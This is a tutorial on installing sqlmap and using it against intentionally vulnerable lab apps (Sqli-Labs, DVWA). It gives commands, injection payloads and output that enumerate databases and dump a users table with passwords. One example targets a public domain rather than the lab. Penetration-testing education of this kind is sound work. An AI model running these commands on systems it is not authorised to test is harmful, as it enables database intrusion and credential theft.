Installation of sqlmap :
sqlmap comes installed by -default with various pentesting distributions like kali-linux, backbox etc. We can also install sqlmap in linux or windows operating systems. Since sqlmap is written in python, so we need to install python interpreter first in our operating system.
Installation in Linux :
In linux based operating systems python is installed by-default. Now you can download sqlmap from http://sqlmap.org. The download link is given right side of the website.
Extract files from compressed zip archive and then run the sqlmap.py file.
We can also install sqlmap directly from the official git repository by below git command.
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev ./sqlmap.py -h
Installation in Windows :
In windows operating system first we need to install python interpreter, which can be downloaded from the python.org. The link for windows installer is : https://www.python.org/downloads/windows/
There are two series of python interpreter available which are : python 2.7.x and python 3.6.x. Sqlmap should run file on both. I am using python 2.7.x in windows. So download the appropriate installer file and install it. For more detailed installation guide of Python in windows please refer the below post.
Installing Python Interpreter in Windows 10
Now go to sqlmap.org and download the sqlmap zip archive file from there and extract all the files.
Now open command prompt and traverse to the sqlmap files directory.
sqlmap.py -h
Sqlmap basic Options :
Some of the basic options in sqlmap are as follows :
| -h, –help | Show basic help message and exit |
| -hh | Show advanced help message and exit |
| -u URL, –url=URL | Target url |
| –cookie | Set authentication cookie used for maintaining access |
| –dbs | Enumerate databases |
| -technique | Specify which SQL injection technique is to be used |
| –dbms | Specify DBMS name if you already know it (your time is precious, save it) |
| -p TESTPARAMETER | Specify if you already know testable parameter(s) |
Sqlmap Usage :
For demonstration purpose we are going to use audi1's Sqli-Labs test bad and DVWA.
1. Simple dbms scan with '-u' flag :
sqlmap -u "target_url" sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1"GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2990=2990 AND 'OsPq'='OsPq
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'AWKs'='AWKs
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6989' UNION ALL SELECT NULL,CONCAT(0x71626b6a71,0x55455363655748446d6b5278574b47486a724a7a446675496547596f564773584e66447149697369,0x71717a6b71),NULL-- wphi
---
[13:28:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12As we can see the id parameter is vulnerable to sql injection, so we can perform further operations.
2. Try to lists all the database present on the server with '--dbs' flag :
sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dbs[13:35:02] [INFO] retrieved: 10
[13:35:02] [INFO] retrieved: information_schema
[13:35:05] [INFO] retrieved: bWAPP
[13:35:06] [INFO] retrieved: challenges
[13:35:08] [INFO] retrieved: dvwa
[13:35:09] [INFO] retrieved: metasploit
[13:35:11] [INFO] retrieved: mysql
[13:35:12] [INFO] retrieved: owasp10
[13:35:13] [INFO] retrieved: security
[13:35:15] [INFO] retrieved: tikiwiki
[13:35:17] [INFO] retrieved: tikiwiki195
available databases [10]:
[*] bWAPP
[*] challenges
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] security
[*] tikiwiki
[*] tikiwiki195
3. List all the tables from a particular database with '--tables' :
sqlmap -u "target_url" --tables -D <database_name> sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --tables -D security[13:39:05] [INFO] retrieved: 4
[13:39:05] [INFO] retrieved: emails
[13:39:06] [INFO] retrieved: referers
[13:39:08] [INFO] retrieved: uagents
[13:39:09] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+4. Getting column of a particular table with '--columns' :
sqlmap -u "target_url" --columns -D <database_name> -T <table_name> sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --columns -D security -T users[13:41:52] [INFO] starting 5 threads
[13:41:52] [INFO] retrieved: username
[13:41:52] [INFO] retrieved: id
[13:41:57] [INFO] retrieved: password
[13:43:04] [INFO] retrieved: password
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+5. Dumping all the data from the table '--dump' :
sqlmap -u "target_url" --dump -D <database_name> -T <table_name> sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security -T usersDatabase: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+6. To dump data from a specific column using '-C' flag :
The syntax would be :
sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D <database_name> -T <table_name> -C "coumn_names" sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security -T users -C "username, password"7. Using sqlmap with cookies data :
Sometimes to access a specific part of a website, we need to provide cookies within the request. In this situation we can use '--cookie' flag in sqlmap. The syntax will be :
sqlmap -u "target_url" --cookie="cookie-data" sqlmap -u "192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=3696c6f8aba1bcae08e988cca359b176"GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'SyrI'='SyrI&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176707871,0x714755524551444f6250764c446b506e434b5266564f426c4976674d5076646a416177744b4f6142,0x7176767871)-- hGEE&Submit=Submit
---
[14:00:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.128. Using sqlmap with login form/Post form :
To test Login forms or Post forms for sql injection vulnerability, the "--data" flag is used. The syntax is :
sqlmap -u "target_url" -data="post_data" sqlmap -u "http://192.168.56.101/sqli/Less-12/" --data="uname=dumb&passwd=12345&submit=Submit"9. Using different injection techniques in sqlmap :
To use different sql injection techniques in injection process the '--technique' flag is used with below letters :
| E | Error-based injection |
| U | UNION-query based injectionis |
| B | Boolean-based blind or simply blind injection |
| T | Time-based injection |
| S | Stacked queries |
| Q | Inline queries |
For example :
sqlmap --technique=U -u "http://192.168.56.103/sqli/Less-1/?id=1" sqlmap --technique=B -u "http://192.168.56.103/sqli/Less-1/?id=1"10. Custom URL Marker
The custom url marker is used to specify the payload injection point in the given url. For this, the * (asterisk) sign is used in the url. For example :
sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=*" sqlmap -u "http://sec-art.net/?name=*&query=web"11. Using sqlmap in multi-threaded mode :
To speed-up the process, we can also we can run injection process with multiple threads. the multi-thread mode is enabled by '--threads' flag. The syntax is :
sqlmap -u "target_url" --theads <number_of_threads> sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --threads 312. HTTP Persistence Connection :
The "--keep-alive" flag is used to keep alive the http connection with the server instead closing and opening the connection again and again. It defends against the server overhead.
Example :
sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --keep-alive13. HTTP Null Connection :
with '--null-connection' flag sqlmap tries to exploit the app without retrieves all the response data.
sqlmap -u "http://192.168.56.101/sqli/Less-1/?id=1" --dump -D security --null-connection14. predict-output Flag :
The predict output flag is used to predict the output of database like table names and columns names, specially in the boolean/time based injection to speed up the process.
sqlmap -u "http://192.168.56.101/sqli/Less-8/?id=1" --dump -D security -T users --predict-output 15. Using sqlmap with proxy :
with '--proxy' flag we can use sqlmap with the proxy server. Syntax :
sqlmap.py --proxy="http://proxyserver:port" -u "target_url" sqlmap.py --proxy="http://myproxyserver.proxy.com:8080" -u "http://192.168.56.101/sqli/Less-1/?id=1"Some of the available options related to database and db users are as follows :
- Current session user :
sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --current-user- Find out if session user is database administrator :
sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --is-dba- Lists database system users using sqlmap :
sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --users- Checking user privileges of database users :
sqlmap -u "http://192.168.56.103/sqli/Less-1/?id=1" --privilegesThere's also a lot of cool stuffs we can do with sqlmap like sql-shell, shell on remote os, read-write files etc. We will look at them in the next post.